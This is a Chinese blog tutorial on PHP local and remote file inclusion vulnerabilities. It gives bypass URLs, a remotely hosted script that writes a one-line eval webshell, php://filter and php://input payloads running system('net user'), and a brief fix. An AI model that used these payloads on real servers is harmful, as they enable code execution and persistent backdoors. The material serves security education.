web安全之文件包含漏洞

最新推荐文章于 2024-04-25 13:59:04 发布
最新推荐文章于 2024-04-25 13:59:04 发布
阅读量392 收藏
点赞数
分类专栏: Web安全 文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xlsj228/article/details/106349461
版权

大多数Web语言都可以使用文件包含操作,其中PHP语言所提供的文件包含功能太强大、太灵活,所以包含漏洞经常出现在PHP语言中。

1 PHP文件包含

1.1 原理

PHP中提供了四个文件包含的函数,分别是include()、include_once()、 require()和require_ once()。这四个函数都可以进行文件包含,但作用却不一样,其区别如下:

●require 找不到被包含的文件时会产生致命错误(E COMPILE ERROR),并停止脚本;

●include 找不到被包含的文件时只会产生警告(E _WARNING),脚本将继续执行:

●include_ once:此语句和include()语句类似,唯区别是 如果该文件中的代码已经被包含,则不会再次包含;

●require _once: 此行语句和require()语句类似, 唯一 区别是如果该文件中的代码已经被包含,则不会再次包含。

当使用这4个函数包含一个新的文件时,该文件将作为PHP代码执行,PHP内核并不会在意该被包含的文件是什么类型。所以如果被包含的是txt文件、图片文件、远程URL,也都将作为PHP代码执行。这一特性,在实施攻击时将非常有用。

1.2 本地文件包含LFI

<?php

include($ GET[test]) ;

?>

则可以利用http://xxx.com/test=C:/WWWRooot/phpinfo.php访问本地的任意文件。

当然本地文件包含通常要结合截断攻击和任意目录游览攻击。

截断攻击:

当PHP版本小于5.3.4时,可以使用%00阶段后面的字符串,如test=C:/WWWRooot/phpinfo.php%00

PHP语言需要使用底层的C语言进行处理,C语言中的字符串结尾有个’/0’字符,作为阶段用。

还可以使用目录截断,操作系统对目录最大长度的限制,可以不需要0字节而达到截断的目的。目录字符串,在Windows下256字节、Linux 下4096字节时会达到最大值,最大值长度之后的字符将被丢弃。如何构造出

./././././././././././././abc

或者

/abc

或者

. ./1/abc/../1/abc/../1/abc

目录遍历:

使用了././这样的方式来返回到上层目录中,这种方式又被称为“目录遍历”(Path Traversal)。常见的目录遍历漏洞,还可以通过不同的编码方式来实现:

在Windows下多个目录应当用分号隔开,在Linux下则用冒号隔开。

修复方式:

要解决文件包含漏洞,应该尽量避免包含动态的变量,尤其是用户可以控制的变量。一种变通方式,则是使用switch枚举。

1.3 远程文件包含

allow_url_fopen = On,该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。

allow_url_include:On,该选项为on便是允许 包含URL 对象文件等。

两个配置选项均需要为On,才能远程包含文件成功。

include/require函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞(Remote File Inclusion,简称RFI)。

则可以利用http://xxx.com/test=http://hack:80/write.txt访问远程的任意文件。

绕过姿势

问号绕过:http://xxx.com/test=http://hack:80/write.txt?
#号绕过:http://xxx.com/test=http://hack:80/write.txt%23
空格:http://xxx.com/test=http://hack:80/write.txt%20

BUff跑

2 文件包含的简单利用

1)读取敏感文件

2)远程包含shell

如果目标主机allow_ _url fopen 选项是激活的,就可以尝试远程包含一句话木马,如:http://www.2cto.com/echo.txt,代码如下:

<? fputs (fopen ("shell.php", "w"),

"<?php eval($_ POST[xxser]);?>") ?>

访问:

htp://www.xxser.com/Index.php?page-ttp://www.2cto.com/echo.txt,将会在Index.php所在的目录下生成shell.php,内容为:<?php eval ($_ POST[xxser]); ?>

3)本地包含配合文件上传

4)使用PHP封装协议

PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。 除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。

读取

page=php://filter/read=convert.base64-encode/resource config.php

写入

在allow_url_include;为On时才可以使用, 构造URL:

 http://www.xxser.com/index.php?page= php://input,并且POST方式提交数据为: <?php system('net user');?>。

5)包含日志

Metasploit中包含了一个脚本自动化完成包含日志文件的攻击。

安全学习交流群:687398569

凌木LSJ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第七式 七伤拳 web安全文件包含漏洞专题.pdf
06-22
tsrc线上培训资料 第七式 七伤拳 web安全文件包含漏洞专题
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
常见Web十大漏洞,常见Web漏洞
qq_22792465的博客
07-27 6312
参考:https://blog.csdn.net/weixin_43376075/article/details/105189017https://blog.csdn.net/qq_43168364/article/details/105595532https://www.cnblogs.com/-qing-/p/10819069.html代码执行函数:1- eval()#传入的参数必须为PHP代码,既需要以分号结尾。比如从指定URL地址获取网页文本内容,加载指 定地址的图片,下载等等。
文件包含漏洞详解
good good study
03-05 5076
大多数情况下,文件包含函数中包含的代码文件是固定的,如上面中的include "./info.php"直接是写死了,因此也不会出现安全问题。但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。上面说了文件包含漏洞的成因是因为代码实现了动态包含包含的路径可控,于是我们将代码进行修改为动态传参的一种方式,建立文件index.php,文件内容如下。文件包含是PHP 的基本功能之一,有本地文件包含和远程文件包含之分。
Web漏洞-文件包含漏洞超详细全解(附实例)_【web漏洞百例】
最新发布
2401_84215240的博客
04-25 1163
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…4.因为这里展示的是show.php文件,因此我们想到直接去访问show.php文件,可以看到当我们直接访问show.php时,网站返回的也是同样的内容。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
文件包含漏洞全解
2301_78287784的博客
06-15 939
以上就是文件包含漏洞所有的内容,通过以上的介绍,我们可以看出文件包含漏洞利用难度,也可以根据他的原理提出修复建议:1、可以限制用户访问文件的权限;2、include函数中的参数用户是否可控,如果可控,则要限制;3、增加过滤,对用户输入的敏感参数进行过滤;4、配置文件中不必要开的参数设置为OFF等等,希望本文能对你有所帮助,星光安全面向基础。
超详细文件包含漏洞原理及修复
weixin_53519320的博客
11-17 3875
一、文件包含是什么 程序开发人员通常会把常用的可复性使用的函数写到一个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 (通俗的来说就是把文件放在一个文件夹下面然后使用的时候就可以直接调用) 文件包含原因 文件包含漏洞的原因? 随着网站业务的需求,程序开发人员一般希望代码更加灵活,所以将包含文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含文件时,用户对这个变量可控而且服务端也没有做合理的校验或者校验被绕过就照成了文件包含漏洞
文件包含漏洞
m0_50818626的博客
06-05 631
④require_once:require语句的延伸,他的功能与require语句基本一致,不同的是,在应用require_once时,先会检查要引用的文件是不是已将在该程序中的其他地方被引用过,如果有,则不会在重复调用该文件。②require:在php文件被执行之前,php解析器会用被引用的文件的全部内容替换require语句,然后与require语句之外的其他语句组成个新的php文件,最好后按新的php文件执行程序代码。文件包含本身并不属于漏洞,由于对包含进来的文件不可控,导致了文件包含漏洞的产生。
Web应用安全:文件包含漏洞简介.pptx
06-18
大多数Web语言都支持文件包含操作,其中PHP语言所提供的文件包含功能太强大、太灵活,也就导致文件包含漏洞经常出现在PHP语言中。这里就以PHP语言为例。 PHP中提供了四个文件包含的函数: include( ) 当使用该函数...
101web漏洞挖掘之任意文件读取漏洞1
08-03
【任意文件读取漏洞详解】 ...总的来说,任意文件读取漏洞是Web应用安全的重要组成部分,理解和防范这类漏洞对于维护网络安全至关重要。开发者和安全人员需要时刻保持警惕,确保代码和系统的安全性。
Web-安全渗透全套教程文件包含漏洞渗透攻击.zip
05-22
综上所述,本套“Web安全渗透全套教程文件包含漏洞渗透攻击”课程将引导学习者了解文件包含漏洞的原理,掌握渗透测试的技巧,以及如何在实际项目中预防这类攻击。通过深入学习和实践,你可以提升自己在Web安全领域的...
谈一下web源码泄露
weixin_52501704的博客
10-27 1301
谈一下web源码泄露
Web安全文件包含漏洞
Python_0011的博客
03-20 937
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。动态包含
第31天:WEB漏洞-文件操作之文件包含漏洞全解
MCTSOG的博客
03-16 1758
文件包含漏洞 0x00 文件包含 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。 0x01 文件包含漏洞的成因 程序开发人员一般希望代码更灵活,所以将被包含文件设置为变量,用来进行动态调用, 但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 几乎所有脚本语言都会提供文件包含的功能。 在PHP中经常出现包含漏洞,但这并不意味这其他语言不存在。 0x02 文件包含漏洞的分类 本地文件包含.
Web漏洞文件包含漏洞
zkaqlaoniao的博客
10-28 6924
公众号:黑客菌 分享更多技术文章,欢迎关注一起探讨学习 一、文件包含漏洞概述 1、漏洞介绍 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚.
WEB漏洞文件包含漏洞
holen_的博客
01-25 2544
介绍 所谓文件包含漏洞,故名思意,就是在文件包含(引用)了其他文件所导致的漏洞。例如有些函数在不同代码中的作用都是相同的,在这里我们可以称呼它为“变量”,那么这时程序员就会将该“变量”放在一个文件中,在其他代码中引用该变量文件即可。 当这种灵活性通过动态变量的方式引入需要包含文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。 脚本利用 我们先创建一个带有文件包含脚本的PHP文件放在服务器上,代码如下 <?php $filename=$_GET['file
web安全:文件上传之文件包含漏洞(php)
smb_yy的博客
09-06 818
执行方式 通过上传文件等方式,上传恶意代码文件,之后通过php文件包含函数执行; php文件包含函数 require():如果出现错误,会抛出一个警告 require()_once():一次性的require()函数 include():如果出现错误,会直接报错,并推出程序 include_once():一次性的include()函数 ...
Web安全漏洞包括文件包含漏洞吗?
05-13
是的,文件包含漏洞Web安全漏洞的一种类型。文件包含漏洞通常发生在Web应用程序中,当应用程序使用用户提供的数据(如文件名或路径)来加载或执行文件时,攻击者可以通过构造恶意输入来实现远程代码执行或敏感信息...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值